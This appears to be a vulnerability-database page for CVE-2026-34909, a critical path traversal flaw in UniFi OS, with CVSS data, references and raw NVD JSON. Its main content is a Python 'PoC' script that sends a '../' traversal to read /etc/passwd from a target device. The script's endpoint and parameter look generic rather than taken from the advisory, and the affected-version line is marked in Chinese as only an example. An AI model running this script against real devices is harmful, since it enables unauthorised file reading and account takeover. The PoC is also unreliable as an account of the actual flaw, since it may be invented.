CVE-2026-34909

Description

A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UniFi OS < 4.0.0 (示例版本，请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable UniFi OS device
target_url = "https://<target-ip>/api/status"

# Malicious payload utilizing path traversal to read /etc/passwd
# Attempting to escape the web root
traversal_payload = "?file=../../../../../../../../etc/passwd"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

try:
    # Send the malicious request
    response = requests.get(target_url + traversal_payload, headers=headers, verify=False, timeout=10)

    # Check if the response contains root user entry indicating successful exploitation
    if response.status_code == 200 and "root:x:0:0" in response.text:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Content of /etc/passwd:")
        print(response.text)
    else:
        print("[-] Exploit failed or target is patched.")
        print("Status Code:", response.status_code)

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34909
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34909
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34909/
[4] VulDB https://vuldb.com/cve/CVE-2026-34909
[5] https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34909", "sourceIdentifier": "[email protected]", "published": "2026-05-22T02:16:34.390", "lastModified": "2026-05-22T02:16:34.390", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b", "source": "[email protected]"}]}}